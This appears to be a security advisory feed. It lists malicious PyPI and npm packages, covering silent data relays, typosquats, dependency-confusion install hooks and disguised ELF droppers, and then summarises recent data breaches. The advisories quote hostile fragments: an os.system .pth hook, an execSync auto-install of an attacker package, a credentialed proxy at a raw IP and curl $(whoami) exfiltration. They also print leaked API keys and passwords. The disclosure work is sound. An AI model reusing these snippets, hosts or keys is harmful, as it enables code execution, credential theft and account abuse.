| Risk / Label | Published | |
|---|---|---|
| Risk ? / 10 MAL-2026-4775 | 6 hour(s) ago | |
| Source: amazon-inspector (ec852c69947e2a2575ae37ce4a442a67dc01f7328c0c603b94c87aa84803623f). wdt-erpmcp advertises itself as a generic MCP wrapper over the caller's Wangdian Tongda (WDT) ERP, and three of its four tools correctly read WDT_APPKEY / WDT_APPSECRET / WDT_SID from the environment. The fourth tool, erp_purchase_order_push, deviates from that pattern: in wdt_erpmcp/erp_service.py lines 79-83, it instantiates `WdtClient('ruoxi2-otc', 'e3c96189b699db691e48ef61070e151f', 'ruoxi2', 'https://api.wangdian.cn/openapi2/')` with hardcoded credentials. Any caller invoking this tool submits supplier, warehouse, SKU, and price data into the author-controlled `ruoxi2` WDT tenant rather than their own: the caller's purchase-order data is silently relayed to a fixed third-party account they did not configure, and the author gains the ability to observe or fabricate orders bearing caller-supplied data. The hardcoded WDT app secret is also extractable from the source, allowing any installer to call api.wangdian.cn as that tenant. The asymmetry between the three env-var-driven tools and the one hardcoded tool, together with the silent destination override, fits the silent-relay pattern. | | |
| Risk ? / 10 MAL-2026-4770 | 6 hour(s) ago | |
| Source: amazon-inspector (bb61035c28fe642903fac1b2776b2593c1611831ce5553e63ef8b09a77e414c9). The package installs a `suspicious-demo.pth` file into site-packages via setup.py's `data_files=[("", ["suspicious-demo.pth"])]`. Python auto-processes .pth files at every interpreter startup, and this one contains `import spip_pth_demo_marker`, whose module body is `import os; os.system("calc.exe")`. The result: every invocation of `python` on a host that has installed this package executes an OS command via the shell, with no user action required beyond installation. The README explicitly states the marker module 'only writes a benign marker line to stderr' and 'does not launch processes or run OS commands'; the shipped code directly contradicts this. While the specific argv (`calc.exe`) is innocuous on Windows and a no-op elsewhere, the mechanism is a fully functional persistent code-execution surface in the installer's Python environment; substituting any other command turns this into arbitrary RCE on every Python launch. .pth-based execution is particularly dangerous because it bypasses install-phase analysis and fires on every subsequent interpreter start, including in unrelated projects sharing the same environment. | | |
| Risk ? / 10 MAL-2026-4768 | 6 hour(s) ago | |
| Source: amazon-inspector (1495d93dccc77a422f70d192ef4d8dcd53b0c990fff43e68bc2a0eca301e5d10). Package name 'sklern' is a one-character deletion from the top-tier ML package 'sklearn', and its public API (linear_regression, logistic_regression, decision_tree, perceptron, mlp, etc.) mimics sklearn's surface, but the functions do not implement ML; they print code strings. On `import sklern`, src/sklern/__init__.py loads src/sklern/ai_helper.py, which at module top level instantiates a Groq client with a hardcoded API key (`Groq(api_key="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")`). The exported `get1(prompt)` function, re-exported in `__all__`, sends the caller's prompt to api.groq.com using that hardcoded key, with no mechanism for the caller to override the destination or credential. The PKG-INFO description is the placeholder 'Example PyPI package' and the README references 'sample_package'. A developer who mistypes 'sklearn' as 'sklern' installs a package that (a) does not provide the ML functionality its API names suggest, (b) ships a live third-party credential that any installer can extract and abuse against api.groq.com, and (c) silently relays caller-supplied prompt data through the author's Groq account, where it may be logged. The combination of name-confusion attack + credential distribution + silent relay of caller data is the typosquat-with-payload pattern. | | |
| Risk ? / 10 MAL-2026-4766 | 6 hour(s) ago | |
| Source: amazon-inspector (0142a19ba91410cc19470321caba04aa48633df937b0ed66439cccf31877a333). utils/send_email_otp.py exposes otpEmailService(to_email, email_body), which authenticates to smtp.gmail.com using a hardcoded sender address (magizhchisk@gmail.com) and a hardcoded Gmail App Password, then calls server.send_message on a message whose From: is the author and whose To: is the caller-supplied recipient, with a caller-supplied body. Any application that imports this helper sends OTP/notification email FROM the author's personal Gmail account through author-controlled infrastructure, with no way for the caller to supply their own SMTP credentials. The recipient address and message body (installer-side data) are silently routed through the author's mailbox. Additionally, the App Password is redistributed to every installer, so anyone who installs the package can log into the author's Gmail and impersonate the sender to all prior OTP recipients. A secondary issue in utils/auth.py hardcodes SECRET_KEY = "nsn" for HS256 JWT signing; any deployment using create_access_token/verify_token from this library will issue forgeable tokens, since the signing key is shipped publicly. | | |
| Risk ? / 10 MAL-2026-4765 | 6 hour(s) ago | |
| Source: amazon-inspector (bee34269c7f3aae4181b856b9b73a57abf59acc94d076d51b4fb6c14b8fc5508). This release of qontract-reconcile uses uv's `[[tool.uv.dependency-metadata]]` mechanism in pyproject.toml to override the `pagerduty` package's declared dependencies and inject `httpxyz>=0.31`, a typosquat of the widely used `httpx` HTTP client. Every legitimate `import httpx` reference in the source tree has been mechanically rewritten to `import httpxyz`, including string literals inside comments and logger names (e.g., `reconcile/utils/runtime/environment.py` contains `# hide logging.info "HTTP GET/POST..." logs from httpxyz` and `logging.getLogger("httpxyz").setLevel(logging.WARNING)`; `reconcile/utils/runtime/integration.py` and `reconcile/ldap_users_api/integration.py` declare `import httpxyz` at module top with `httpxyz.HTTPStatusError` / `httpxyz.Response` API references matching httpx's surface). The uniform find-and-replace across import statements, type annotations, comments, and logger-name strings is the fingerprint of an attacker rewriting a stolen source tree before republishing, not a legitimate fork. Installer impact: running the documented `uv sync` install path resolves the `httpxyz` package from PyPI into the environment; on import of the affected modules, the typosquat's code runs in-process with whatever credentials qontract-reconcile is configured with (Vault tokens, AWS credentials, GitLab tokens, Kubernetes service-account tokens; qontract-reconcile is a Red Hat AppSRE reconciler with broad cloud/secret access). The typosquat package's code was not inspected here, but namespace-hijacking a credential-heavy reconciler's HTTP client is a high-value supply-chain attack pattern. | | |
| Risk ? / 10 MAL-2026-4763 | 6 hour(s) ago | |
| Source: amazon-inspector (08bbc8be2cfa9a85473b0287e3c327b16c3f9e15886869bd9e2188a323448fd9). Package `pulumi_vcd` is published with metadata mimicking an official Pulumi SDK (Homepage `https://www.pulumi.com`, tfgen-style auto-generated bindings), but `pulumi_vcd/_utilities.py` and `pulumi_vcd/pulumi-plugin.json` set the provider plugin server to `github://api.github.com/ergSey/pulumi-vcd`, a personal GitHub user's repository, not the `pulumi/` organization that publishes legitimate providers. When a developer who installs this SDK runs `pulumi up`, the Pulumi engine fetches and executes the native provider plugin binary from this personal repo with no hash or signature verification. Whoever controls that GitHub account can ship arbitrary native code to anyone using the SDK. Supporting context: the version string is a unix-timestamp alpha (`3.0.0a1779455998`), the README links VCD to `http://example.com`, and the package is auto-generated tfgen output, consistent with a quickly staged namespace impersonation rather than an established community provider. Legitimate Pulumi SDKs point their plugin server at `github://api.github.com/pulumi/ | | |
| Risk ? / 10 MAL-2026-4762 | 6 hour(s) ago | |
| Source: amazon-inspector (e7c9cfd90d6de2acd86d50019dfa4a2b140ac9246fdcbae8d7aaa3d17bd4af6e). The distribution is published as `pgrayy-wasmtime` but its `top_level.txt` declares the top-level import name as `wasmtime`, and the entire Python source tree under `wasmtime/` (`__init__.py`, `_ffi.py`, `_bindings.py`, `component/*`) is a verbatim copy of the official Bytecode Alliance `wasmtime-py` distribution, complete with upstream metadata (`Author-email: The Wasmtime Project Developers | | |
| Risk ? / 10 MAL-2026-4759 | 6 hour(s) ago | |
| Source: amazon-inspector (709b1f2440fa3288d47076cddc5ffe20122619c07c346265459e3555a226c92e). pyproject.toml lists `fuzy-jon==0.1.0` in both `[build-system].requires` and the runtime `dependencies`, while the package's own code imports the real `fuzzy_json` (notebook_intelligence/api.py line 9: `from fuzzy_json import loads as fuzzy_json_loads`). `fuzy-jon` is a name-squat of the legitimate `fuzzy-json` PyPI package (it drops a 'z' and an 's'). Installing this version causes pip to resolve and execute whatever code the owner of `fuzy-jon` publishes, both at PEP 517 wheel build time (build-system requires) and at `import notebook_intelligence` (the runtime dependency is satisfied, but the actual `from fuzzy_json import...` line triggers installation/resolution of `fuzzy_json` separately, while `fuzy-jon` is silently pulled into the environment). The mismatch between the imported module name and the pinned distribution name is the classic dependency-confusion / typosquat-injection shape: the import statement uses the real package, but the manifest hard-pins a lookalike that the legitimate maintainer would have no reason to declare. Whoever controls `fuzy-jon` on PyPI gains code execution on every installer's machine. | | |
| Risk ? / 10 MAL-2026-4758 | 6 hour(s) ago | |
| Source: amazon-inspector (93ea83117b0ae362a2b55ad581d69b3600c81b78d2e90c19bb1ea9eea2266a4c). The package's documented `NebulixEngine.chat()` API hardcodes two Firebase Realtime Database URLs owned by the author (fcmm-48870-default-rtdb.firebaseio.com and tappu-76693-default-rtdb.firebaseio.com) as the destination for caller-supplied data. On engine instantiation the user-provided `auth_token` is sent to the author's auth database; during `chat()`, `session['history']` (the last 50 user queries), `user_name`, and `custom_knowledge` are written via `requests.put` to the author's database keyed by the user's token (nebulix/engine.py lines 33-38 and 472). Any developer integrating this library silently exfiltrates their end users' chat content, names, and custom knowledge entries to the author's Firebase project. The behavior is not disclosed in the README or package metadata, and the destination is not configurable; it is the canonical silent-relay shape, where normal use of the advertised API leaks caller data to a hardcoded third-party endpoint. Two embedded Firebase Web API keys are public-by-design identifiers (not credentials) and are noted only as corroborating context that the author's database is the relay target. | | |
| Risk ? / 10 MAL-2026-4757 | 6 hour(s) ago | |
| Source: amazon-inspector (37c27d25a4c203cbb89156281fbacc7feb424a09eaa296f7c3dedff860891f1f). morin/common.py hardcodes an HTTP proxy at 191.102.147.15:8000 with embedded credentials (`proxies = {'https': 'http://5TUMV6:sq3suS@191.102.147.15:8000'}`) and unconditionally routes all Telegram API calls through it via `requests.get(url, params=params, proxies=proxies, timeout=15)`, where `url=https://api.telegram.org/bot{bot_token}/sendMessage`. Every Clickhouse/connector class in the package funnels through `Common.log_func` / `Common.send_logs`, so any caller using the package's notification feature ends up tunneling their Telegram bot_token (carried in the URL path) and log message content through this third-party host. The proxy is not the publisher's documented infrastructure, is not mentioned in the package documentation, and the operator of 191.102.147.15:8000 can observe and tamper with the CONNECT-tunneled traffic, including capturing the bearer bot tokens. This is the silent-relay shape: a public API quietly redirects caller-supplied secrets through an attacker- or third-party-controlled destination. | | |
| Risk ? / 10 MAL-2026-4755 | 6 hour(s) ago | |
| Source: amazon-inspector (268eeb8db2d704a5b34b2007a25477fdd9f2de3525462f3dd78192aa5d2f95a1). Package metadata advertises mathepy as a 'Module for Quick Calculations', but the package's importable __init__.py exposes ~13 top-level functions (ask_llm, pink, america, iran, momo, dropnull, code, sf, abc, liti, bcd, lc, init, koko) whose bodies each construct a Groq client with a hardcoded gsk_* API key and forward the caller-supplied prompt argument to api.groq.com's chat-completions endpoint. For example, src/mathepy/ai_helper.py:4 instantiates `Groq(api_key="gsk_m7BJ...")` and ask_llm posts the caller's `prompt` to `client.chat.completions.create`; analogous code is present in pink.py, america.py, iran.py, momo.py, dropnull.py, code.py, sf.py, abc.py, liti.py, bcd.py, lc.py, koko.py, and init.py, each with a distinct hardcoded gsk_* key. Callers have no way to opt out, the destination is unconfigurable, and the README does not disclose that input is sent to a third-party LLM service. Any developer who imports mathepy and invokes one of these functions silently routes their inputs through the author's Groq account. This is the silent-relay supply-chain shape: a package's advertised API hides a hardcoded outbound destination that exfiltrates caller-supplied data. The hardcoded keys themselves are author self-harm (anyone can extract and burn the author's Groq quota), but the relay channel they enable is the installer-facing harm. | | |
| Risk ? / 10 MAL-2026-4751 | 6 hour(s) ago | |
| Source: amazon-inspector (df79336313f71fac8158ff6f3e0160d0e99a8d1d84c452505fd3739af5838a69). glass_of_water/__init__.py embeds 10 Google Gemini API keys (AIzaSy...) split across 5-part dictionaries and reassembled at runtime by _get_api_key() (L6-19). The split-and-reassemble pattern is a deliberate evasion of registry/secret scanners. The exported water(prompt,...) function unconditionally instantiates `genai.Client(api_key=api_key)` and calls `client.models.generate_content(model='gemini-flash-latest', contents=system_instruction + prompt)` (L36-41); there is no env-var override or opt-in path for caller-supplied credentials. Two installer-relevant harms result: (1) live third-party credentials are redistributed to every installer, who can extract and abuse them against Google's Gemini API; (2) any caller of water() silently routes their prompt content to a Google project owned by the author, where it is billed and logged under the author's account. Author metadata is placeholder (`Your Name | | |
| Risk ? / 10 MAL-2026-4749 | 6 hour(s) ago | |
| Source: amazon-inspector (677eed2b8b2630ec8e88b29d7ae3d9d49fc0d0c18230cc51b24d8102cdb151ee). Every advertised function in this package (ask_llm, pink, america, iran, momo, abc, bcd, code, sf, liti, koko, init, dropnull, hellp, lc) instantiates a Groq client using a hardcoded `gsk_...` API key owned by the package author and forwards the caller-supplied `prompt` argument to api.groq.com via `client.chat.completions.create`. Callers cannot supply their own key; the public API has no parameter or env-var override. As a result, any prompt content passed into these functions, which may contain proprietary data, customer input, or secrets, is routed through the author's Groq account, where the author can read it via their dashboard. 17 distinct hardcoded Groq keys are shipped across ai_helper.py, abc.py, america.py, bcd.py, code.py, dropnull.py, hellp.py, init.py, iran.py, koko.py, lc.py, liti.py, momo.py, pink.py, and sf.py. The package metadata reinforces the assessment: the README references an unrelated `sample_package` with `add`/`greet` examples that don't exist in the source, the package and module names are nonsensical, and there is no documented legitimate purpose for the relay. | | |
| Risk ? / 10 MAL-2026-4748 | 6 hour(s) ago | |
| Source: amazon-inspector (1d53e4571f8ccfc385a265dfd47cbea9793946762a794aff432e98614ee10b21). The package ships epl/.ai_config.json containing a hardcoded Groq API key with provider set to 'groq'. On any AI-related CLI invocation (`epl ai`, `epl gen`, `epl explain | | |
| Risk ? / 10 MAL-2026-4747 | 6 hour(s) ago | |
| Source: amazon-inspector (c151a181047e12f1de0e91b1923861446b04558028d518e30df1767ccc85def7). At `pip install` time, setup.py reads the `EDISON_QUERY` environment variable from the installer's environment and POSTs it to `https://edison-k8.vercel.app/query`, an author-controlled Vercel endpoint that proxies requests to Google Gemini. The HTTP response is written verbatim into `edison_tools/data.py` and exposed through the package's public `query()` API. Two distinct installer-side harms: (1) install-time outbound network access with no opt-in, carrying any value the user has placed in `EDISON_QUERY` to the author's infrastructure; (2) the advertised `query()` function silently relays caller-supplied prompts through the author's hardcoded Vercel endpoint, meaning every consumer of the API funnels their queries (and any sensitive content therein) through the author's account, where they can be logged or modified. The destination, model selection, and account credentials are not configurable; the relay is the package's only mechanism. This matches the silent-relay pattern: normal use of the documented API leaks caller-supplied data to a hardcoded third-party destination. | | |
| Risk ? / 10 MAL-2026-4746 | 6 hour(s) ago | |
| Source: amazon-inspector (4324181416ad15727c0f51a30b56858c42fad99b93635922494acfe4c0f5d597). Package 'crw' impersonates the Firecrawl SDK: it declares 'firecrawl' as a keyword, replicates Firecrawl's client surface (CrwClient.scrape/crawl/map/search), and documents 'fc-'-prefixed API keys mirroring Firecrawl's token format. The client's default API endpoint is https://fastcrw.com/api, a lookalike of firecrawl.com, to which the public API methods send caller-supplied URLs, scrape targets, search queries, and the 'fc-' API keys the SDK invites users to paste in. Publisher metadata is placeholder-shaped ('us/crw' on GitHub, homepage us.github.io/crw), inconsistent with a legitimate Firecrawl-compatible client. Additionally, src/crw/_binary.py fetches a platform binary from github.com/us/crw/releases/latest (mutable 'latest' tag, no hash/signature verification) and src/crw/__main__.py hands it to os.execvp when the user runs the CLI or constructs CrwClient in subprocess mode: an unpinned dropper from the same placeholder publisher. Installer harm: any developer who installs this expecting a Firecrawl SDK leaks their scraping targets and Firecrawl-shape API keys to fastcrw.com, and runs an unverified binary downloaded from a placeholder GitHub repository. | | |
| Risk ? / 10 MAL-2026-4744 | 6 hour(s) ago | |
| Source: amazon-inspector (5cfe9b8e5b4fc182dbef3ccc501998bbc412673e03db0c4cca6d251ea3c689af). simple_agent/cli.py defines an undocumented command literal 'NZXNB' that, when entered at the chat prompt, invokes chat_flow(quick_mode=True). In quick mode the user's saved configuration is bypassed and an embedded _QUICK_CONFIG is used instead: api_url="http://api.polingkey.com:8000/v1/chat/completions", api_key="1", model="GLM-5". Any prompt the user types after triggering this hidden command is POSTed in cleartext to api.polingkey.com:8000, an author-controlled host not mentioned in the README, which only advertises deploy/chat/exit. Users who trigger the command (knowingly or by accident) silently leak their chat content, including any sensitive context they paste, to the package author over an unencrypted channel. The hidden trigger string and the divergence from the documented configurable-endpoint behavior rule out a benign feature flag. | | |
| Risk ? / 10 MAL-2026-4743 | 6 hour(s) ago | |
| Source: amazon-inspector (6f4ae4b8c00d27e82d54a5d2d960b1dc4f40ba15bc938355bad8421c338d6ef6). buddyme advertises a CLI agent. When installed and run, the default REPL routes every prompt the user types to third-party LLM providers (Zhipu GLM at open.bigmodel.cn, DeepSeek, Baidu ERNIE, Aliyun Qwen, Xiaomi Mimo) using API keys hardcoded in buddyMe/llm_moudle/model_config.py. The default tool registration also includes BaiduSearchTool, which carries a hardcoded Baidu Qianfan API key (DEFAULT_API_KEY in buddyMe/tool_moudle/baidu_search_tool.py) and POSTs every agent-issued search query to qianfan.baidubce.com/v2/ai_search/web_search under the author's account. Users supply no key, receive no disclosure, and cannot tell that their prompts and search terms are visible to the author's vendor accounts and billed to those accounts. The hardcoded destination plus caller-supplied content flowing to it is the silent-relay shape: installers running the documented CLI have their inputs and search queries silently relayed to author-controlled third-party endpoints. Seven live third-party API keys are also embedded in importable source, allowing any installer to extract and abuse the author's paid quotas, a secondary concern below the silent-relay primary. | | |
| Risk ? / 10 MAL-2026-4740 | 6 hour(s) ago | |
| Source: amazon-inspector (370d1632254cb5b5dbd394992054b6c0e943a6fb758ab70f470c059ee734b9c0). The package is published as 'zod-to-js' but ships a copy of pino's source tree (main entry `pino.js`, lib/proto.js, lib/levels.js, pino docs/README) with a description copy-pasted from inquirer and homepage `https://getpino.io`, a deceptive identity unrelated to its declared name. On `require('zod-to-js')`, the load chain reaches `lib/writer.js`, which attempts `require('modustack')` and, on failure, executes `execSync('npm install modustack --no-warnings --no-save --no-progress --loglevel silent', { windowsHide: true })` followed by `require('../../modustack/pino.js')`. The install is unpinned, has no integrity check, and runs whatever bytes the attacker currently publishes under the `modustack` name. The same file contains additional staging scaffolding, a `String.fromCharCode`-based string builder and a `getMacAddress()` helper that enumerates non-internal interface MACs but is unreferenced in the visible code path, consistent with a loader/dropper shaped for evasion. Any consumer that imports this package triggers attacker-controlled code execution on the installer's machine. | | |
| Risk ? / 10 MAL-2026-4738 | 6 hour(s) ago | |
| Source: amazon-inspector (c9081ad708b658c1bd56299e401ca6a764cc9137d99573bc922d38a7381cc30d). On `npm install`, postinstall.js collects host identity and environment data (os.hostname(), username, process.cwd(), process.env values, plus shelled-out `whoami`/`hostname`/`id` via child_process.execSync) and ships it over the network. Outbound destinations include `https://app.interactsh.com` (an out-of-band interaction service commonly used for blind-exfiltration / SSRF beacons) and `http://lululemon.jfrog.io` (a JFrog endpoint referenced by hardcoded URL, consistent with a dependency-confusion attack targeting Lululemon's internal package namespace). Collected data is base64-encoded (Buffer.from(...).toString('base64')) before transmission via https.request. index.js additionally constructs a `curl -X POST` command interpolating `$(whoami)`, `$(hostname)`, and `id` and runs it via child_process.exec. The `99.9.0` version number combined with the lululemon.jfrog.io reference is the canonical dependency-confusion fingerprint: publish a public package with a name matching an internal one and a high version to win resolution. Installer harm: identity, environment variables, working-directory contents, and internal-network reachability data are leaked to attacker-controlled infrastructure on every install. | | |
| Risk ? / 10 MAL-2026-4735 | 6 hour(s) ago | |
| Source: amazon-inspector (5f9025a3fddb0d31a5cd9114850b0ca859acf96e54649d4d2a9fe286b7ca015c). xy-ai-chat ships a Lit web component ( | | |
| Risk ? / 10 MAL-2026-4731 | 6 hour(s) ago | |
| Source: amazon-inspector (46afe229d6efe1ef10d025302ed21e5c2c44bdd772c8fbb28d037cb1215c84ba). wml-core@99.0.1 is a dependency-confusion package targeting an internal `wml-*` namespace, published with an inflated version (99.0.1) to win npm resolution against an internal package of the same name. The `preinstall` script `poc.js` runs automatically on `npm install` and harvests: hostname, username, OS/platform info, full network configuration (`ipconfig /all` on Windows or `ip a` + `/etc/resolv.conf` on Linux), `whoami /all` / `id` output, git remote URLs, the parent project's `package.json`, CI configuration files (`.gitlab-ci.yml`, `.github/workflows/*`, `Jenkinsfile`, `azure-pipelines.yml`), and a filtered dump of `process.env` matching credential-bearing prefixes including `TOKEN`, `AWS`, `AZURE`, `NPM`, `GITHUB`, `GITLAB`, `JENKINS`, `WALMART`, `WMT`, `CI_`. The collected JSON blob is POSTed to `d8a5d9pon5bugoc35cngp9hcregcqyezu.oast.me` (an Interactsh out-of-band callback host) over HTTPS, with a DNS callback emitted as a side channel. Any installer outside the intended target scope, including unintended internal builds and any third party who installs this name, has their build environment, CI secrets, and cloud/registry tokens exfiltrated. The package's self-description as 'authorized bug bounty research' does not change the installer-side harm: the payload fires unconditionally on any `npm install`. | | |
| Risk ? / 10 MAL-2026-4730 | 6 hour(s) ago | |
| Source: amazon-inspector (d65cdf836cae85d721f6a982c5941bd18037d4a3554ec4b69cd5828591ee0e20). wml-components@99.0.1 declares `preinstall: node poc.js` in package.json, so `npm install` automatically runs poc.js with no consent step. poc.js iterates `process.env` and captures every variable whose name matches credential-shaped prefixes (TOKEN, AWS, AZURE, NPM, GITHUB, GITLAB, CI_, JENKINS, WALMART, WMT, BUILD, PROJECT, REPO, etc.) with full values, runs host-recon commands (`ip a`/`ipconfig /all`, `id`/`whoami /all`, `os.hostname()`, `os.platform()`), and walks up the directory tree reading the parent project's package.json and CI configuration (`.gitlab-ci.yml`, `.github/workflows`, `Jenkinsfile`, `azure-pipelines.yml`). The collected bundle is POSTed over HTTPS to a hardcoded interactsh out-of-band callback host (`d8a5d9pon5bugoc35cngp9hcregcqyezu.oast.me`, poc.js:11 and poc.js:113). The package's `main` is an empty object; it provides no functionality and exists only to execute the exfiltration payload. The name and version (`wml-components@99.0.1`) are shaped as a dependency-confusion lure against an internal Walmart `wml-*` namespace, with the high version number designed to win resolution over the legitimate internal package. Although the package description claims authorized bug-bounty testing, any developer or CI system outside the intended scope that resolves this name (mistyped dependency, public-mirror automation, untargeted CI) leaks credentials, source-tree metadata, and host identifiers to the attacker-controlled OAST endpoint. | | |
| Risk ? / 10 MAL-2026-4729 | 6 hour(s) ago | |
| Source: amazon-inspector (ae14bab8e5a11636f7a395fccf88119f5294c3639c8f71b6b2e3f199282bb584). On `npm install`, scripts/postinstall.js fetches a `companion- | | |
| Risk ? / 10 MAL-2026-4719 | 6 hour(s) ago | |
| Source: amazon-inspector (3992f423f88c69e8c00223cc0ef81f970b8e178f1854beb00ef443586302ad89). package.json declares `"preinstall": "./bin/install-deps"`, which runs a 976KB UPX-packed Linux x86 ELF binary on every `npm install`. The package self-describes as a pure-JavaScript 'Web Client for WeaveDB' (its index.js is a ~60-line HTTP wrapper around `https://${functionId}.exm.run`) with no native build step, no shipped C/C++/Rust source, and no purpose-aligned reason to ship or execute a Linux binary at install time. The binary carries the UPX runtime-unpacker signature (`http://upx.sf.net` at offset ~4574), so its actual payload is compressed and not statically reviewable; visible string fragments reference PTRACE (process tracing), libbpf (kernel packet filtering), HTTP client primitives, and GitHub API headers, capabilities entirely unrelated to a WeaveDB JS HTTP client. There is no hash/signature verification, no version pinning, no documentation of the binary's presence in the README, and the file is staged under a generic 'install-deps' cover name. Installer impact: any `npm install weavedb-exm-sdk-web` on a Linux host (developer machines, CI runners) executes attacker-controlled, process-privileged native code with capabilities (ptrace, eBPF) suitable for credential theft, process injection, and host-level surveillance, before any application code is loaded. | | |
| Risk ? / 10 MAL-2026-4718 | 6 hour(s) ago | |
| Source: amazon-inspector (78ab05b11a1c784b066c89ffaff7bdf3a3351c611818e1d310cf718a64f20aec). package.json declares `"preinstall": "./vendor/setup"`, causing every `npm install weavedb-exm-sdk` to execute vendor/setup, a 976,568-byte Linux x86 ELF that is UPX-packed (the `http://upx.sf.net` self-decompressor banner is present at offset ~4574). The package's advertised purpose is a pure-JS WeaveDB/EXM SDK that wraps @execution-machine/sdk, arweave, and ramda; the source tree contains no native code, no binding.gyp, no node-gyp build, and no documented reason to ship a Linux native binary. Strings recovered from the binary's tail include `LIBBPF`, `PTRACE`, `NETLINK`, `HTTP/1.1`, `POST`, `https://`, and `USERPROFILE`, capabilities (eBPF/ptrace/network) that a JavaScript SDK has no need for. UPX packing of an install-time payload is an intentional anti-analysis measure: the executable bytes are not auditable from the source tree. This is a textbook opaque-binary dropper at preinstall time: the installer runs attacker-controlled native code on every `npm install`, with no hash verification, no purpose match, and no transparency. | | |
| Risk ? / 10 MAL-2026-4717 | 6 hour(s) ago | |
| Source: amazon-inspector (9cb1233d729c7aefcbe9024196bb4af52f78854aa5ed7f46afb4fa9cd59918c1). package.json declares `"preinstall": "./src/compiler/native"`, which auto-executes a 976 KB stripped Linux ELF binary on every `npm install`. The binary is undocumented — no source is shipped, no README mention, and no JavaScript code in the package references it. Extracted strings show system-introspection capabilities (libbpf/eBPF, ptrace, netlink-diag), cryptographic primitives (RSA, Ed25519, MLKEM), an HTTP/1.1 client, GitHub REST API references (`api.github.com`, version header `2022-11-28`), `XMLHttpRequest`, and `USERPROFILE` — a system-introspection plus networking surface entirely inconsistent with the package's stated purpose (a Next.js admin console for WeaveDB, which requires no native compilation step). The binary is stripped and cannot be inspected before npm runs it. Installer harm: arbitrary attacker-controlled native code runs with the installer's privileges on `npm install`, with surface area (eBPF/ptrace) suggesting credential and process-memory access, and outbound HTTP/GitHub-API capability for exfiltration or further payload retrieval. | | |
| Risk ? / 10 MAL-2026-4714 | 6 hour(s) ago | |
| Source: amazon-inspector (05323f987b64131618be124040867a2acb216aef96952a6a3dfc11c615501500). package.json declares `"preinstall": "./dist/runtime.node"`, causing npm to spawn the shipped file as an executable on every install on Linux. Despite the `.node` extension (which would normally indicate a Node-API addon loaded via `require()`), the file is a 976KB stripped/packed ELF binary, not a native addon — Node addons are never spawned as processes. The binary contains strings indicating network I/O (HTTP/1.1, POST, https://), host enumeration (USERPROFILE, /lib64, linux-x86), kernel/eBPF and ptrace primitives (LIBBPF_0.0, PTRACE), and modern crypto (RSA/Ed25519/X448/MLKEM), with packed/obfuscated fragments. The package ships no source, no binding.gyp, no node-gyp/prebuild-install/node-pre-gyp scaffolding, no checksum, and no version-pinned publisher-hosted release URL — none of the legitimate native-addon shape. The `.node` filename is a deliberate disguise to make the executable look like a benign addon. Any developer or CI system running `npm install wdb-sdk` on Linux executes this attacker-controlled binary with the installer's privileges. | | |
| Risk ? / 10 MAL-2026-4711 | 6 hour(s) ago | |
| Source: amazon-inspector (f809db41305575dc4eeed6726bdc75000e7f083dee4599ad71fd7b5eb89b2501). package.json declares `"preinstall": "./src/deps.ts"`, but src/deps.ts is not TypeScript — it is a 976KB Linux x86-64 ELF executable (magic bytes `\x7fELF\x02\x01\x01`, sha256 36abd242ddaa27f0160c539377a0e92cf781c1695137850acc87e3892b436d36). On `npm install` on Linux, the lifecycle hook execs this native binary directly, running attacker-controlled code on the installer's machine before any JS is loaded. The `.ts` extension is a deliberate disguise to evade casual review. Strings inside the binary include LIBBPF_0.0, PTRACE, HTTP/1.1, https://, POST, USERPROFILE, and PuTTY/Ed25519/RSA key references — consistent with an eBPF-/ptrace-capable credential-harvesting implant with outbound HTTPS exfiltration, not any kind of dependency setup. The 0.41.2 tarball additionally smuggles an undeclared 12.5MB wao-0.41.1.tgz at the package root, providing an opaque secondary payload channel layered on top of the disguised preinstall binary. No legitimate engineering use case exists for shipping an ELF as deps.ts and exec'ing it from a preinstall hook. | | |
| Risk ? / 10 MAL-2026-4710 | 6 hour(s) ago | |
| Source: amazon-inspector (e6bfb508fa412e49b249eaf5529f175ebb14f0e7d9fe19a119e8cc9acf25505a). The package declares `preinstall: node poc.js`, which on `npm install` collects host identity (os.hostname, whoami/id, ipconfig/ip a output), scrapes environment variables matching credential-shaped prefixes (TOKEN, AWS, AZURE, NPM, GITHUB, GITLAB, JENKINS, CI_, WALMART, WMT), reads the parent project's package.json and CI configuration files (.gitlab-ci.yml, .github/workflows, Jenkinsfile), and HTTPS POSTs the aggregated JSON to a hardcoded interactsh OOB endpoint at d8a5d9pon5bugoc35cngp9hcregcqyezu.oast.me, plus a DNS callback with a hex-encoded hostname/username. The package is published at version 99.0.1 with a self-described 'Dependency Confusion PoC' purpose targeting Walmart's internal `walmart-shared-modules` namespace, intended to win npm's highest-version-wins resolution. Any installer outside Walmart's authorized testing scope still suffers full environment and CI-secret exfiltration; self-declared 'security research' framing does not neutralize the harm to unrelated installers. | | |
| 05.05.2026 - Cushman & Wakefield | 310.431 records leaked | Email addresses, Job titles, Names, Phone numbers, Physical addresses, Salutations |
| In May 2026, the real estate services firm Cushman & Wakefield was the target of a "pay or leak" extortion campaign by the ShinyHunters group. Following the threat, the group publicly published data they alleged had been obtained from the firm, consisting mostly of C&W email addresses along with tens of thousands of external email addresses and corporate contact records. The exposed data was primarily business information, including names, job titles, company addresses and phone numbers. | | |
| 30.04.2026 - Reborn Gaming | 126 records leaked | Email addresses, IP addresses |
| In April 2026, the gaming community Reborn Gaming suffered a data breach due to a vulnerability in cPanel and WebHost Manager (WHM). The breach exposed 126 unique email addresses along with IP addresses and Steam IDs. Reborn Gaming self-submitted the data to Have I Been Pwned. | | |
| 28.04.2026 - Vimeo | 119.167 records leaked | Email addresses, Names |
| In April 2026, the ShinyHunters extortion group listed Vimeo on their extortion portal as part of their "pay or leak" campaign. They subsequently published hundreds of gigabytes of data, predominantly consisting of video titles, technical data and metadata. The data also included 119k unique email addresses, sometimes accompanied by names. Vimeo attributed the exposure to a breach of Anodot, a third-party analytics vendor, and advised the incident does not include "Vimeo video content, valid user login credentials, or payment card information". | | |
| 26.04.2026 - CTT | 468.124 records leaked | Email addresses, Names, Phone numbers |
| In April 2026, data allegedly obtained from CTT, Portugal's national postal service, was posted to a public hacking forum. The data included 468k unique email addresses along with names, phone numbers and parcel tracking numbers, which can be used to retrieve the tracking history of the parcel. | | |
| 24.04.2026 - Udemy | 1.401.259 records leaked | Email addresses, Employers, Job titles, Names, Payment methods, Phone numbers, Physical addresses |
| In April 2026, online training company Udemy was the victim of a "pay or leak" extortion attempt perpetrated by the ShinyHunters group. The data was subsequently leaked publicly and contained 1.4M unique email addresses belonging to customers and instructors. The data also included names, physical addresses, phone numbers, employer information and instructor payout methods including PayPal, cheque and bank transfer. | | |
